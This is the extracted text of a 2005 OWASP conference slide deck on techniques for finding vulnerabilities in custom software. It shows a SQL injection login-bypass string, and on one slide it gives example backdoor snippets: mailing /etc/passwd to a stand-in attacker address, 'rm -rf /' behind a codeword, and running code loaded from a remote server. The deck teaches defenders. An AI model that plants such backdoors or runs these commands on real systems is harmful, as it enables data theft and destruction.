Copyright © 2004 - The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License.

The OWASP Foundation

4th Annual NTC ISSA InfoSec Nashville Conference August 24, 2005

http://www.owasp.org

The Art of Finding Flaws – Techniques for Finding Vulnerabilities in Custom Software

Jeff WilliamsCEO, Aspect SecurityChair, OWASP Foundationjeff.williams@owasp.org410-707-1487

2OWASP

The Future

Ingredients: Sun Java 1.5 runtime, Sun J2EE 1.2.2, Jakarta log4j 1.5, Jakarta Commons 2.1, Jakarta Struts 2.0, Harold XOM 1.1rc4, Hunter JDOMv1

Software Facts

Modules 155 Modules from Libraries 120

% Vulnerability*

* % Vulnerability values are based on typical use scenarios for this product. Your Vulnerability Values may be higher or lower depending on your software security needs:

Cross Site Scripting 22 65%

SQL Injection 2Buffer Overflow 5

Total Security Mechanisms 3

Encryption 3

Authentication 15

95%

Modularity .035

Cyclomatic Complexity 323

Access Control 3

Input Validation 233

Logging 33

Expected Number of Users 15Typical Roles per Instance 4

Reflected 12

Stored 10

Cross Site Scripting Less Than 10 5 Reflected Less Than 10 5 Stored Less Than 10 5SQL Injection Less Than 20 2Buffer Overflow Less Than 20 2Security Mechanisms 10 14 Encryption 3 15

Usage Intranet Internet

3OWASP

Today

Code is code All sectors All languages All platforms All computing models All sizes Intra/Extra/Inter-net

New types of vulnerabilities are rare

The market doesn’t value secure code

We trust code we shouldn’t

Cheaper, faster only

We don’t have any idea whether our code is trustworthy or not

4OWASP

Why Find Vulnerabilities?

Nobody believes their software is vulnerable“If the software works, then it must be secure”

Finding flaws starts you on the path

FindFlaws Fix Find

Flaws Improve FindFlaws Improve

If you’re not finding them, you’re allowing them

5OWASP

Software Is A Black Box

ComplexMillions of lines of codeLayers of leaky abstractionsMassively interconnected

CompiledDifficult to reverse engineerDifferent on every platform

Legal ProtectionsNo peekingWe’re not liable

6OWASP

Key Vulnerabilities

A few serious common vulnerabilities…Broken Access ControlWeak Authentication and Session ManagementSQL InjectionCross Site Scripting

For more information see… The Top Ten Most Critical Web Application Vulnerabilities

(www.owasp.org/documentation/topten.html)

A Guide to Building Secure Web Applications and Web Services (www.owasp.org/documentation/guide.html)

7OWASP

SQL Injection Illustrated

Fir

ewal

l

Hardened OS

Web Server

App ServerF

irew

all

Dat

abas

es

Leg

acy

Sys

tem

s

Web

Ser

vice

s

Dir

ecto

ries

Hu

man

Res

rcs

Bill

ing

Custom Code

APPLICATIONATTACK

Net

wo

rk L

ayer

Ap

plic

atio

n L

ayer

Acc

ou

nts

Fin

ance

Ad

min

istr

atio

n

Tra

nsa

ctio

ns

Co

mm

un

icat

ion

Kn

ow

led

ge

Mg

mt

E-C

om

mer

ce

Bu

s. F

un

ctio

ns

HTTP

requestSQL

queryDB

Table

HTTP

response

“SELECT * FROM users WHERE user=‘’ OR

1=1--’ AND pass=‘password’”

1. Application presents a login form to the attacker

2. Attacker sends an attack in the form data

3. Application forwards attack to the database in a SQL query

Successful Login“Welcome, Alice”

4. Database runs query containing attack and sends results to application

5. Application thinks login worked and sends welcome page

8OWASP

Scanning for SQL Injection

MethodUse “signatures” to send malformed SQL

commandsAnalyze responses to see if it “worked”Nessus, nikto, absinthe

ProsRequires only network access to applicationFast and easy to run

ConsMay only exercise part of an applicationProne to false alarms and missed positivesResults indicate URL but not line of codeCan be problems with credentials, roles, and SSL

9OWASP

Static Analysis for SQL Injection

MethodAutomatically analyze source code for patternsTools load source code, compile, and analyze

ProsRequires only the software baselineFast and easy to run

ConsCan’t factor in the runtime environmentProne to false alarms and missed positivesResults indicate line of code but not URLDoesn’t find design problems

10OWASP

Penetration Testing for SQL Injection

MethodCustom attacks by an expert security testerUse OWASP WebScarab to craft custom attacksExpert analyzes responses to see if attack worked

ProsOpen source tools availableRecommend an internal team

ConsRequires expertise in security, software, and SQLDifficult to exercise the entire applicationTester may not be able to determine success

11OWASP

Code Review for SQL Injection

MethodReviewer analyzes code for patternsUse tools to view baseline in different waysExamine mechanisms, common vulnerability

areas

ProsCost-effectiveCan examine the entire baseline

ConsCan’t factor in the runtime environmentRequires skills in software and security

12OWASP

Security Analysis Techniques

Find Vulnerabilities Using the Running Application

Find Vulnerabilities Using the Source Code

AutomatedAutomatedVulnerabilityVulnerabilityScanningScanning

AutomatedAutomatedStatic CodeStatic Code

AnalysisAnalysis

ManualManualPenetrationPenetrationTestingTesting

ManualManualCodeCode

ReviewReview

Combining All Four Techniques is Most Effective

13OWASP

Vulnerability Patternspublic class DamagedStrutsForm extends ActionForm{public void doForm( HttpServletRequest request) {

UserBean u = session.getUserBean();u.setName(request.getParameter("name"));u.setFavoriteColor(request.getParameter("color"));

}

public boolean validate( HttpServletRequest request) {try {

if ( request.getParameter("Name").indexOf("<scri") != -1 ) {logger.log("Script detected" );return false;

}}catch( Exception e ) {}return true;

}}

Failure to Validate

Blacklist Validation

Fail Open

Failure to Validate

Time of Check, Time of Use

Failure to Validate

14OWASP

A Change In Perspective

Think like an attacker!Understand how the application worksEspecially the security mechanismsHow does the application make security decisions

The easy part?Test and analyze for a single vulnerability

The hard part?Do an entire application for all types of

vulnerabilities

15OWASP

Getting Started

Adopt the OWASP Top TenSet the bar

Spot check a few applicationsAre your security mechanisms easy to

understand?Are you doing validation, error handling, logging,

etc?

Get security out in the open!

Come to my talk later to find out more!!!

16OWASP

OWASP Can Help

Open Web Application Security ProjectNonprofit FoundationAll materials available under approved open

source licensesDozens of projects, over 50 chapters

worldwide, thousands of participants, and millions of hits a month

OWASP is dedicated to finding and fighting the causes of insecure software

17OWASP

OWASP Supports Vulnerability Analysis

OWASP Top Ten Set priorities, get management buy-in

OWASP Guide 300 page book for application security

OWASP Testing Guide Test/analysis methods for application security

OWASP WebScarab Web application & web service penetration tool

18OWASP

Some of What You’ll Find at OWASP

Community Local Chapters Translations Conferences Mailing Lists Papers and more…

All free and open source We encourage your

company to support us by becoming a member

Documentation Guide Top Ten Testing Legal AppSec FAQ and more…

Tools WebGoat WebScarab Stinger DotNet and more…

19OWASP

What Could a Malicious Developer Do?

Trojan Horse runs for adminif ( System.getCurrentUser().getName().equals( “admin” ) ) Runtime.exec( “sendmail hacker@badguys.com < /etc/passwd” );

Secret trigger removes all files on root partitionif( req.getParameter( “codeword” ).equals( “eagle” ) ) Runtime.exec( “rm –rf /” );

Randomly corrupt data one time in 100if ( Math.random() < .01 ) bean.setValue( “corrupt” );

Load and execute code from remote server((A)(ClassLoader.getSystemClassLoader().defineClass (null,readBytesFromNetwork(),0,422).newInstance())).attack();

Make backdoor look like inadvertent mistakeif ( input < 0 ) throw new RuntimeException( “Input error” );

Impossible to tell malicious from mistake

Who wrote the libraries your application uses?

OWASP

AQ&Q U E S T I O N SQ U E S T I O N S

A N S W E R SA N S W E R S

Q&A